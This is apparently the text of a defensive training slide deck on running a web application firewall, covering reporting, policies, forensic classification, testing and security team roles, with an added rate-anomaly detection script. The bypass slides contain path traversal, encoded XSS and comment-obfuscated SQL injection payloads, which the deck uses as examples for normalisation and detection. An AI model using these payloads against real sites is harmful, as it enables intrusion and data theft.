   Security reporting: Graphs, Statistics, Logs, Dashboard
   Support reporting – WAF logs: Audit, Maintenance, System
   o Audit – who did what – changes to policy
   o Maintenance – update / upgrade fails
   o System – memory, configuration
159. Support reporting – examples
   Audit – who did what – changes to policy:
     #User admin access from IP X on Sunday 1:01 AM GTM
     #User admin change policy to allow access from IP Y
     #User admin reboot me
   Maintenance – update / upgrade fails:
     Upgrade is needed to version X
     Update failed
     Updates for version X is success
   System – memory, configuration:
     Resources allocation memory increase in 5M total of 16GB
     CPU spike to 90% for 10 minutes
160. Utilities
   Logging: ❑ Local ❑ Remote ❑ All requests ❑ Hits only
   Log repository: ❑ Internal ❑ External ❑ Size: 6T ❑ Time: 6-month request ❑ Fault tolerance
   3rd party: ❑ ICAP ❑ Network FW integration
   CM: ❑ Local ❑ Dedicated ❑ CP utility ❑ Pull / push config ❑ Update / upgrades ❑ WAF centralized report ❑ Policy ❑ Traffic aggregation (unified reporting)
   Updates: ❑ Break fix ❑ CVE updates ❑ New features ❑ Hotfix ❑ Engineer hot fix ❑ Full update file; delivered via ❑ GUI ❑ API ❑ Config ❑ RPM ❑ SW ❑ ISO – OS + SW ❑ ISO – SW
   Upgrade: ❑ Migration tools ❑ WAF config restore ❑ Rollback; upgrade schema: ❑ Stand by / Active ❑ Active / Active ❑ New / old
   Life time policy: ❑ Sustain release ❑ Feature release ❑ Product life time ❑ Support life time
   HA: ❑ Load balancing ❑ Cluster ❑ Scaling
   Support tools – support reporting: ❑ Audit log ❑ Maintenance ❑ System ❑ Debug; policy export – restore: ❑ Text ❑ HTML ❑ Binary ❑ JSON ❑ XML ❑ Manual GUI ❑ API
161. Always on the watch, ready to exterminate the next attack
162. WAF management
   Policies per service: ALL/APP1, ALL/APP2, LOGIN/APP2, 20, 30, 40 on IP:80, IP:8080, IP:8008
   Levels: • Site level • Zone level • App level
   Per location (CI, A, SIG/R): • Edge -> screening • Perimeter -> classic • Mesh -> microservice
163. Policy strategies – separation of entry points
   Entry points into the web application (abstraction layers, applications, request handlers, AAA, databases; SIEM, analytics): Browser, Mobile app / {API}, Mobile browser, Mobile client app, Admin, CLI, {JSON}, [QS/PD]
164. API entry point protection points
   Data plane API, Control plane API, Integration API, Deploy API; payloads {JSON} and [QS/PD] from Browser, Mobile app / {API}, Mobile client app, Admin, CLI, Web app
165. Supply chain attacks
   Classic chain: Border router → Firewall → ADC → WAF → Application/s → Request handler/s → Data storage
   Modern chain: Border router → Firewall → ADC → WAF NG → Application/s → Request handler/s → Data storage, plus 3rd party SW: • Server/s • Services • Libraries • Functions – "free for all"
   Exists but not exploitable
166. Control plane protection
   Data plane: app usage by the corporate user and by users from the Internet (HTTP)
   Control plane: remote admin and corporate admin over the corporate network (IP); NF and E (edge)
   Attacker targets: • APP vul • CP vul
167. Multi layer security solution – WA-CAV policy
   AUTOMATED ATTACKS – Anti auto: CI: First request; CI: First response; A: Session opening rate; A: RPS increase on session; S: User agent
   ADDoS – Anti floods: A: RPS from IP; A: RPS to URL; A: RPS from Geo; A: RPS from session
   BRUTE FORCE – Anti bf: A: RPS from IP to login URL; A: RPS from any IP to login URL; A: RPS from Geo to login URL; A: RPS from session to login URL
   WEB EXPLOITS – Anti web exploit: S: Specific CVE exploits; S: Generic exploits; R: Meta char on parameter values; R: Anti evasions
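The anomaly (A:) detections of the multi layer slide, computed over a constructed request log as an added example; this is not the deck's or any vendor's code, and the thresholds, the login URL set, the log records and the action mapping are all assumptions made for the demonstration. Each alert comes out as an E-D-P item (entity, detection, prevention).

```python
"""Added example, not from the deck: the anomaly (A:) detections listed on the
multi layer slide computed over a constructed request log, each reported as an
E-D-P item (entity, detection, prevention). Thresholds, the login URL set and
the action mapping are constructed for the demonstration."""
from collections import Counter, defaultdict

LOGIN_URLS = {"/login.php", "/user_login.php"}

# Constructed per-second thresholds, in the spirit of the dashboard's "1 IP 100 req".
THRESHOLDS = {
    "RPS from IP": 100,
    "RPS to URL": 1000,
    "RPS from IP to login URL": 10,
    "Session opening rate": 10,
}

# Constructed prevention action per detection (anomaly -> anti floods / anti ATO).
ACTIONS = {
    "RPS from IP": "rate limit",
    "RPS to URL": "alarm",
    "RPS from IP to login URL": "block",
    "Session opening rate": "client interrogation",
}


def synth_log():
    """Constructed log records: (second, source_ip, session_id, method, path)."""
    log = []
    for i in range(5):                       # five ordinary users, three hits each
        for _ in range(3):
            log.append((0, f"192.168.1.{i + 1}", f"user-{i}", "GET", "/blog.php"))
    for _ in range(120):                     # one source hammering /search.php
        log.append((0, "10.0.0.138", "bot-1", "GET", "/search.php"))
    for j in range(12):                      # 12 login POSTs, each on a fresh session
        log.append((0, "10.0.0.7", f"fresh-{j}", "POST", "/login.php"))
    log.append((1, "192.168.1.1", "user-0", "GET", "/sell.php"))  # quiet next second
    return log


def detect(log, thresholds=THRESHOLDS):
    """Return E-D-P alerts: one per (second, entity) that crosses a threshold."""
    per_sec = defaultdict(list)
    for rec in log:
        per_sec[rec[0]].append(rec)
    seen_sessions = set()
    alerts = []

    def raise_alert(sec, entity, value, detection, count):
        alerts.append({"time": sec, "entity": entity, "value": value,
                       "detection": detection, "count": count,
                       "action": ACTIONS[detection]})

    for sec in sorted(per_sec):
        recs = per_sec[sec]
        by_ip = Counter(r[1] for r in recs)
        by_url = Counter(r[4] for r in recs)
        by_ip_login = Counter(r[1] for r in recs if r[4] in LOGIN_URLS)
        opened = Counter()                   # sessions first seen this second, per IP
        for _, ip, sid, _, _ in recs:
            if sid not in seen_sessions:
                seen_sessions.add(sid)
                opened[ip] += 1
        for ip, n in by_ip.items():
            if n > thresholds["RPS from IP"]:
                raise_alert(sec, "IP", ip, "RPS from IP", n)
        for url, n in by_url.items():
            if n > thresholds["RPS to URL"]:
                raise_alert(sec, "URL", url, "RPS to URL", n)
        for ip, n in by_ip_login.items():
            if n > thresholds["RPS from IP to login URL"]:
                raise_alert(sec, "IP", ip, "RPS from IP to login URL", n)
        for ip, n in opened.items():
            if n > thresholds["Session opening rate"]:
                raise_alert(sec, "IP", ip, "Session opening rate", n)
    return alerts


if __name__ == "__main__":
    for a in detect(synth_log()):
        print(f"E:{a['entity']}={a['value']} D:{a['detection']} ({a['count']}) P:{a['action']}")
```

The ordinary 192.168.1.x users stay below every threshold, so they produce no E-D-P item; only the two constructed abusive sources do.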
168. Protection elements -> PR
   Parser – Entities:
   Protocols: ❑ HTTP 1.1 ❑ API ❑ Mobile API
   Payloads: ❑ Text ❑ JSON ❑ XML
   User input: ❑ Login ❑ Search text ❑ Posting
   Traps – Detections:
   Signature: ❑ Informational (W,B,D) ❑ Generic exploits (W,B,D) ❑ Specific exploit (W)
   Anomaly: ❑ Request per second (W,B,D) ❑ Failed log in (B) ❑ Session opening (W,B,D)
   Restriction: ❑ Character sets (W,B) ❑ RFC & evasion (W,B,D) ❑ Flow
   Client interrogation: ❑ CAPTCHA (W,B,D) ❑ Client capabilities (W,B,D) ❑ Source ID (SID) (W,B,D)
   Enforcer – Prevention action:
   ALERT: ❑ GUI: dashboard / iLog [M] ❑ Email / SMS ❑ Instant messaging
   BLOCK: ❑ Blocking page [M] ❑ TCP FIN / RESET / Drop [M] ❑ Stripping / Cloaking
   LIMIT: ❑ Rate limiting (RPS) [M] ❑ Time limiting [M] ❑ Session limiting
   FOLLOW UP: ❑ Redirect to main / honeypot ❑ Soft blocking ❑ Retaliation
169. Users group – WAF as a traffic manager
   Traffic groups sorted by the WAF (CI, A, SIG/R): Threat actors; Risky users / traffic; MVU – Most valuable users; PVU – Potential valuable users; Authorized automation; Partners; 3rd party; Scrubbing center
170. Site Access Policy (SAP)
   [Diagram: Signatures, Anomaly, Restrictions and Anomaly layers applied as the site access policy]
171. Forensic Investigation Procedure (SIRT FIP)
   Classify sources: • Source IP – RPS • Source IP – sessions • Source IP geo
   Classify client: • Simple client / simple bot • Browser / full browser bot • Human / full human bot
   Classify pattern: • Well formed • Structure • Position
   Classify actions: • CRUD • Flow • Timeline
   Verdict: • V: Clearly good user request • M: Clearly harmful request • S: Potentially harmful
   Prevention action: ✓ Allow ✓ Exempt – all / partial X Block – specific request / IP X Shun – all traffic from IP/session ? Monitoring – need more data
172. HTTP client classification (pass / fail at each level)
   CI – L1 Browser base test: Simple client vs. Simple bot
   CI – L2 Browser attributes: Browser client vs. Full browser bots
   CI – L3 Mouse movements: Human client vs. Full human bots
173. Classify sources: clients / sources / users – RPS – historical
   Device | IP | Sessions | RPS | Flow / Top URLs
   Laptop | New | 10 | 100 | Register → Login → Cart → Pay
   PC | Returning | 15 | 1000 | Browse_IS → Login → Pay
   IOT | New | 1000 | 25000 | /ping /swcheck
   Mobile phone – browser | Returning | 150 | 3500 | /sell /browser?ID=
   Mobile phone – App | New | 2 | 30 | appmobile/V1/
174. Security request log – classify pattern
   Classify pattern: • ETF • ATF • User input • Well known • Context
   Incident list: R1, R2, R3, R4 ... Rx
   R1 (incident summary):
     GET /3143551953695648522.php HTTP/1.1
     User-Agent: Mozilla/5.0
     Host: sirt.club
     Entity: 3143551953695648522.php; Detections: meta char in URL ‘; Prevention: blocking page; Time: 11:12:13; Source IP: 10.0.0.138
   R1 (raw request):
     GET /314355195369564852’2.php HTTP/1.1
     User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
     Pragma: no-cache
     Cache-Control: no-cache
     Content-Length: 0
     Host: sirt.club
   R2 (raw request):
     TRACK / HTTP/1.1
     Connection: Keep-Alive
     Host: sirt.club
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
     Trace-Test: Nikto
   R3 (raw request):
     OPTIONS /API/V1/login HTTP/1.1
     User-Agent: Mozilla/5.0 Firefox/11.0
     Accept: image/webp,*/*
     Accept-Language: en-US,en;q=0.5
     Host: sirt.club
175. Classify actions – user action and flow
   Pages and parameters: / (Info, dynamic); products: ProductID, Cat; Login: username, password; Account: username, email; Payment: pay, CCN; checkout: amount, password
   Flow 1: a) Main page browse b) Link: login page c) Bookmark: account d) Login
   Flow 2: a) Browse / add items b) Login c) Auto login d) Login
   Flow 3: a) Check out b) Update CCN c) Browse items d) Login
   Flow 4: a) Payment b) Browse items c) Payment d) Login
   Timings shown on the slide: 1 min, 2 min, 30 sec, 1 sec, 2 sec, 1.5 sec
176. WAF bypass and normalization
   WAF bypass; WAF security exposure
177. WAF bypass and normalization – goal: bypass the WAF protections
   % Case insensitive % Comments % Encoding % Tricks and Koontz
   Examples from the slide:
     GET /search.php?q=../../../../../../etc/passwd HTTP/1.1
     GET /search.php?q=&#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c HTTP/1.1
     GET /search.php?q= SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
     GET /search.php?q=&quot; &apos; exploit &amp; &lt; &gt; &nbsp;
178. Path obfuscation / evasion
     GET /search.php?q=/etc////passwd HTTP/1.1
     Host: #@$!$#@$
   The web server accepts /etc////passwd and changes it to /etc/passwd. "What should the WAF do?" Match the signature against /etc/passwd or /etc////passwd: allow / block
179. Normalization – anti bypass
     GET /search.php?q=ExPloiT HTTP/1.1
     Host: sirt.club
   Norm: change to lower case -> exploit -> WAF signature match
     GET /search.php?q=' and 1=0 un/**/ion/**/sel/**/ect all f/*haha*/rom table HTTP/1.1
     Host: sirt.club
   Norm: remove the comments in the parameter value -> ‘and 1=0 union select all from table; -> match sig
   Any true condition in the parameter value -> match sig; any OR X = X/Y -> block:
     OR ‘bypass' = ‘bypass’
     OR ‘Bypass’ = A’Bypass'
     OR 'Koontz' = ' Koo'+'ntz'
     OR 'Koontz' LIKE ‘Koo%'
     OR 'Koontz' > ‘K'
     OR 'Koontz' < ‘Z'
  180. 180. 70295 © 0 5 10 15 FISCAL YEAR TRAFFIC REPORT CVE 10.0 Heads up Imminent by design Activism Sales promotions $ D Day’s Threats actor opportunity Shopping
  181. 181. 70295 © 0 1 2 3 4 5 6 7 off hours monring monring noon noon after noon after noon off hours off hours Main App Users Partners Attack AMO 1. Riding the wave 2. Decoy 3. Multi vector 1.App Stress 2.Vul hunting 3.Brute force
  182. 182. 70295 © 0 1 2 3 4 5 6 7 off hours monring monring noon noon after noon after noon off hours off hours Main App Users Partners Attack Traffic Riding attacks Who is doing ETF and who is doing ATF ?
  183. 183. 70295 © Attack Elements ▪ Vulnerability ▪ Attack Surface ▪ Attack Agent ▪ Exploit ▪ Attack Vector ▪ AMO GRAPHS STATISTICS LOGS DASHBOARD REPORTING • Entities • Detections • Prevention • Rule • Rule sets Protection elements Protection rule Protection policy PROTOCOL PAYLOAD – HEADERS USER INPUT SIGNATURES ANOMALY RESTRICTIONS CLIENT INTERROGATION ALERT BLOCK LIMIT FOLLOW UP Search the AE’s in the PE’s using the reporting to stop the attacks with Prevention rules Relationships : AE, PE, Policy and Reporting
  184. 184. 70295 © PR No Hits OK FN Hits RA FP 1. Enforce 2. Monitoring -> Refine 3. Enforce 4. Alert -> Refine Block -> alert – refine 1 2 3 4 Rule maturity = Time + Traffic Handling RA/FP/FN/FA 1. RA – Real Attack: true attack needs blocking 2. FP – False Positive: wrong detection (blocking but shouldn’t) 3. FN – False Negative: lack of detection (should be blocked but not) 4. FA – False alarm: mistake
  185. 185. 70295 © BTR AMI Vulnerable AMI Under attack AMI Compromised 2. MITIGATIONS SEEK DESTROY SEEK PREVENT Y/N APPLY VERIFY SEEK RECOVER APPLY VERIFY APPLY VERIFY N=BTR 3. RESPONSE SEVERITY Y/N SEVERITY RA/FP/FN SEVERITY
  186. 186. 70295 © WA-CAV Score - Site Brute force App DDoS Vul Hunting 60% 80% 50% By requirement* Traffic Break Down Valuable users - Allow Suspicious - Monitor Malicious – Block App A 71% 6% 25% App B 20% 20% 60% App C 61% 20% 17% Security Level 63.3% 58.2% SECURITY CENTER
  187. 187. 70295 © App Attacks Incidents WAF health – site Site Traffic E:H D:S BLOCK E:URL D:A ALARM 1IP 100 Req Critical E:IP D:R RATE LIMIT Medium High 1IP 10Req 10IP 1000Req 56.00% 58.00% 60.00% 62.00% 64.00% 66.00% 68.00% 70.00% 72.00% App 1 App2 App3 App4 80% 95% 95% 20% 23% 31% WAF A – Zone 1 (Main) WAF B – Zone 2 (sub) CPU Memory Bandwidth CPU Memory Bandwidth By requirement*
  188. 188. 70295 © DDoS Brute force Web Exploits Scanners CVE hunting SECURITY CENTER App Attack Report Attacks Mitigated
  189. 189. 70295 © 0 2 4 6 8 10 12 14 16 Q4 Q1 Q2 Q3 CAV over time BF DDoS Web Expolits SECURITY CENTER CAV Attack report
  190. 190. 70295 © Mobile Users Remote employee Web Bot User Allowed automated traffic HACKED PURPOSE BUILD BOTNET Cloud Internet Traffic diversity chaos
  191. 191. 70295 © Valuable users Malicious Suspicious We now talk about CUSTOMER not USER Unknown – allow & monitoring Offending – Blocking TRAFFIC MGR WAF – the Traffic Manager
  192. 192. 70295 © / Info param5 products param6 param2 Login username password Payment pay details Credit card number checkout amount password Analytica Pre login Post login Cart no pay Pay New users 100 50 15 20 Returning users 70 44 5 45 WAF - Traffic Analyzer
  193. 193. 70295 © App: main Number of visits Time: /Search engine Per 1 day Per 1 week Per 1 month Search engine A 2 10 20 Search engine B 0 2 6 Search engine C 10 150 3000 Traffic break down Valuable customers (allowed) Allowed automation Suspicious monitored Malicious – blocked App A 71% 2% 6% 21% App B 20% 1% 20% 59% App C 61% 1.5% 20% 17% Valuable users – customers – Breakdown Total RPS 11,000 80000 Top URL 22,000 RPS 11,0000 Total session 12000 active sessions 8000 new sessions 1000 active sessions 8000 new sessions IP/ session IP-X (3000) IP-Y (1200) IP-Z (2000) IP-X (2300) IP-Y (1000) IP-Z (1500) WAF - Visibility manager
  194. 194. 70295 © Service Data Compute Know your security ! The strength the weakness and how to close the gap
  195. 195. 70295 © WAF levels: Signature Anomaly Restrictions Client interrogation ID/PS Yes No No No Bot Manager No No No Yes WAF Yes Yes Yes No WAF NG Yes Yes Yes Yes WAF levels by PE (detection) *Full requirements in SIRT.club WAF levels: Web Exploit Brute Force aDDoS Automated traffic ID/PS Partial Limited Limited Limited Bot Manager Partial Partial Partial Partial WAF Good Best Best Good WAF NG Best Best Best Best
196. WAF policy requirement (DSMM) by PE
Parser – Entities
 Protocols: ❑ HTTP 1.1 ❑ API ❑ Mobile API
 Payloads: ❑ Text ❑ JSON ❑ XML
 User input: ❑ Login ❑ Search text ❑ Posting
Traps – Detections
 Signature: ❑ Informational ❑ Generic exploits ❑ Specific exploit
 Anomaly: ❑ Requests per second (RPS) ❑ Failed log in (FLI) ❑ Session opening
 Restriction: ❑ Character sets ❑ RFC & evasion ❑ Flow
 Client interrogation: ❑ CAPTCHA ❑ Client capabilities ❑ Source ID (SID)
Enforcer – Prevention Action
 ALERT: ❑ GUI: dashboard / iLog ❑ Email / SMS ❑ Instant messaging
 BLOCK: ❑ Blocking page ❑ TCP FIN / RESET / Drop ❑ Stripping / Cloaking
 LIMIT: ❑ Rate limiting (RPS) ❑ Time limiting ❑ Session limiting
 FOLLOW UP: ❑ Redirect to main / honeypot ❑ Soft blocking ❑ Retaliation
197. WAF requirement (DSMM) – WAF RFP
App: ❑ Classic ❑ Modern ❑ Mix
Location
 Cloud: ❑ Cloud public ❑ Cloud private ❑ Multi cloud ❑ Hybrid (cloud <-> on prem)
 On prem: ❑ On prem ❑ Multi on prem ❑ Hybrid (on prem <-> cloud)
Management: ❑ For you ❑ Semi ❑ You
WAF type: ❑ Edge ❑ Perimeter ❑ Perimeter (360) ❑ Mesh
Software
 SW type: ❑ HW OS SW ❑ OS SW ❑ SW
 Virtualizations: ❑ vOS ❑ vSW – Container ❑ vSW – K
Security Mgmt – Sec OPS
 Policy level: ❑ ID/PS ❑ Bot MGR ❑ WAF ❑ WAF NG
 Security reporting: ❑ Security center (learning) ❑ WAF reporting ❑ Graphs ❑ Risk reporting ❑ Statistics ❑ Mitigation reporting ❑ Event log ❑ Forensics
OPS
 Deployment: ❑ ISO file ❑ RPM ❑ VM image
 Config: ❑ API ❑ Config file ❑ GUI ❑ ______
198. WAF requirement (DSMM)
Utilities
 Logging: ❑ Local ❑ Remote ❑ All requests ❑ Hits only
 Log repository: ❑ Internal ❑ External ❑ Size: 6T ❑ Time: 6-month request ❑ Fault tolerance
 3rd party: ❑ ICAP ❑ Network FW integration
 CM: ❑ Local ❑ Dedicated ❑ CP utility ❑ Pull / push config ❑ Update / upgrades ❑ WAF centralized report ❑ Policy traffic aggregation (unified reporting)
Updates and upgrades
 Updates: ❑ Break fix ❑ CVE updates ❑ New features ❑ Hotfix ❑ Engineer hot fix ❑ Full update file ❑ GUI ❑ API ❑ Config ❑ RPM ❑ SW ❑ ISO – OS + SW ❑ ISO – SW
 Upgrade: ❑ Migration tools ❑ WAF config restore ❑ Rollback
 Upgrades / upgrade schema: ❑ Stand by / Active ❑ Active / Active ❑ New / old
 Life time policy: ❑ Sustain release ❑ Feature release ❑ Product life time ❑ Support life time
HA: ❑ Load balancing ❑ Cluster ❑ Scaling
Support tools
 Support reporting: ❑ Audit log ❑ Maintenance ❑ System ❑ Debug
 Policy export – restore: ❑ Text ❑ HTML ❑ Binary ❑ JSON ❑ XML ❑ Manual GUI ❑ API
199. Testing types – App / WAF
Stack under test: Web app, App, Virtualization – OS/HW; Web Server, App Server, Database Server.
Testing types: testing the app for vulnerabilities; testing the infrastructure for vulnerabilities; testing traffic loads; testing the scaling mechanism; testing the supply chain for vulnerabilities; testing functionality; testing hardening and defaults; testing user input; fuzzing; testing coverage.
200. Capacity planning – App / WAF. Breaking points shown across the stack (Web app, Web Server, App Server, Database Server, Virtualization – OS/HW): 95%, 80%, 98%, 80%.
201. Security testing – App / WAF
Testing the App without WAF; testing the WAF; testing the App with WAF.
✓ AE testing – RA
✓ PE testing – CAV/SAP
✓ SE testing – FN
202. WAF assessment
Scores: Brute force 60%, App DDoS 70%, Web exploit 50%, Automated attacks 35%.
Traps – Detections
 Signature: ❑ Information ❑ Generic exploits ❑ Specific exploit ❑ Customer
 Anomaly: ❑ Requests per second (RPS) ❑ Failed log in (FLI) ❑ Session increase ❑ Session opening
 Restriction: ❑ Character sets ❑ RFC & evasion ❑ Evasion ❑ Flow ❑ Structure
 Client interrogation: ❑ CAPTCHA ❑ Client capabilities ❑ Source ID (SID) ❑ If then
Enforcer – Prevention Action
 ALERT: ❑ GUI: dashboard / iLog ❑ Email / SMS ❑ Instant messaging ❑ Mobile App
 BLOCK: ❑ Blocking page ❑ TCP FIN / RESET ❑ Drop connection ❑ Stripping / Cloaking
 LIMIT: ❑ Rate limiting (RPS) ❑ Time limiting ❑ Session limiting ❑ Access limiting
 FOLLOW UP: ❑ Redirect to main ❑ Redirect to honeypot ❑ Soft blocking
203. How to test it
Path under test: NF, Router, NWFW, WAF NG, ADC/LB.
Security controls test: Vulnerability scanner (CVE); Pen test – manual / crafted botnets; Bug bounty – mass wisdom; Red team – proprietary tools.
204. Vulnerability and security exposure
• Testing for vulnerabilities in the web application
  • Use the WAF to virtual patch
  • Patch the app
• Testing for vulnerabilities in the WAF
  • Patch the WAF
  • DP vs CP
• WAF bypass – the WAF can be bypassed, but there is no vulnerability in the web app to protect
  • Fix the WAF
  • Holistic approach
• Security exposure – the WAF can be bypassed, exposing the web app to a vulnerability that exists (FN)
  • Fix the WAF
  • Holistic approach
205. WAF testing types. Deployments tested: web, cloud, NF, App srv, MESH. Security mgmt: unified results.
206. Security testing – testing personnel
SOC, Security team, External STA, Internal STA, CSIRT, PSIRT, 3rd party evaluator.
PSIRT – patching products / application.
CSIRT – any type of attack on/in the org.
STA – org security advisor / SGP / assessment.
207. WAF assessment security score: internal testing, external testing, average.
Brute force: I: 60%, E: 60%, A: 60%
App DDoS: I: 80%, E: 70%, A: 75%
Vul hunting: I: 40%, E: 50%, A: 45%
208. Service, Data, Compute – Disruption, Breach, Compromised.
• Am I under attack?
• Am I vulnerable?
• Am I compromised?
Protection elements: Entities, Detections, Prevention. Protection rule: Rule, Rule sets. Protection policy.
CURRENT POLICY / BYPASS POLICY / MISSING POLICY.
FN – missing; RA – rule set; FP – clean traffic; SE – bypass.
Current, Limitation, Improve. Pre prod, Base prod, Post prod.
209. Defensive Security – Personal protector of the realm. Show time. Powered by SIRT.club. The human factor.
210. Complex ecosystem: Vendor A (Hardware), Vendor B (Software), Consulting, Apps provider, 3rd party lib, Users, Cloud provider, Data center provider, App provider, Hacking – Crime, Hacking – Gov, Internet providers, Open source, Misc vendors, Misc visitors.
211. SIRT pillars and responsibility
PSIRT: Vul Mgmt, publication, industry comm.
CSIRT: IR readiness, SIR, recovery.
STA: SGP, eval, legal.
212. Security Trusted Advisor (STA). In the ORG: Dev, Support, Pre Sales, Sales, PM, Marketing. Outside the ORG: Legal, Press, Tech Comm, Social, Industry, Media.
213. SIRT scaling (org chart): GM, VP, Dir SIRT, Dir, Mgr NA, Mgr WW, SME, Sr SE, SE, Jn SE, across CSIRT, PSIRT and TASIRT.
214. Management: CSO, EVP. PSIRT: VP, Dir/Mgr, SEs. CSIRT: VP, Dir/Mgr, SEs. TASIRT: VP, Dir/Mgr, SEs.
215. Security Personnel – Traditional. Where should security be?
DEV (Coders, Architect; Staging ENV, Prod ENV):
▪ Developing the Web App
▪ Web servers
▪ App server
▪ Databases
▪ Sessions management
▪ Functionality
▪ ….
OPS (NF, WAF NG, Application Server/s, Web Server/s, Database Server/s):
▪ Deployment – WAF/NF/LB, DNS
▪ Networking
▪ HW, SW – install, update, upgrade
▪ Storage
▪ ….
216. Security Personnel – Modern. Where should security be? (Dev ENV, Staging ENV, Prod ENV; NF, WAF NG)
DEV (Coders, Architect):
▪ Developing the Web App
▪ Microservices
▪ Containerized
▪ Functionality
▪ ….
DEV OPS:
▪ App – CIA
▪ Resources
▪ Security
▪ ….
OPS:
▪ Deployment – WAF/NF/LB, DNS
▪ Networking
▪ HW, SW – install, update, upgrade
▪ Storage
▪ ….
217. Managing the software and security. Layers: Hardware, Operating system, WAF, Network; Cloud; DP – PE, CP. Activities: Policy building, SIR, Configuration / Setups / Updates, Reporting. Responsibility: Vendor manage / You manage / You-Vendor manage.
218. SE Matrix (columns per role, in order: Jn SE, SE, Sr SE, Architect, Security Trusted Advisor)
Target: Knowledge (theory) Y Y Y Y Y; Skills (hands on) i ii iii iii iii; Experience (time) 1Y 3Y 6Y 10Y 14Y
Attack: Knowledge Y Y Y Y Y; Skills ii iii iii iii iii
Security: Knowledge Y Y Y Y; Skills ii iii iii iii iii
Policy: Knowledge Y Y Y Y; Skills i i iii iii iii
Incidents: Knowledge Y Y Y; Skills ii iii iii iii
Architecture: Knowledge Y Y; Skills i iii ii iii
Operations: Knowledge Y Y Y Y; Skills ii i i iii
Traffic control: Knowledge Y Y; Skills iii iii iii
Assessment: Knowledge Y; Skills i i iii
SIRT
Roles: Jn SE, SE, Sr SE, Architect, Security Trusted Advisor. Skill levels: i. Basic level; ii. Advanced level; iii. SME – Expert.
219. Learning path (Knowledge over Time / experience), roles Jn SE, SE, Sr SE, Architect, TSA: 1. TARGET, 2. THREAT INTEL, 3. SECURITY, 4. POLICY BUILDING, 5. RESPONSE, 6. SECURITY DESIGN, 7. TRAFFIC MANAGEMENT, 8. OPERATIONS, 9. ASSESSMENT.
1) You think you know but you don't know
2) You know that you don't know – learning
3) You don't know that you know – value
4) You know that you know – Master
220. Mission board: PSIRT, CSIRT, STA, Management (CSO). Task cadence: one-time tasks, daily tasks, weekly tasks, twice-monthly tasks, monthly tasks, quarterly tasks, twice-yearly tasks, yearly tasks, per-need tasks.
221. http://SIRT.club
222. Keep it safe
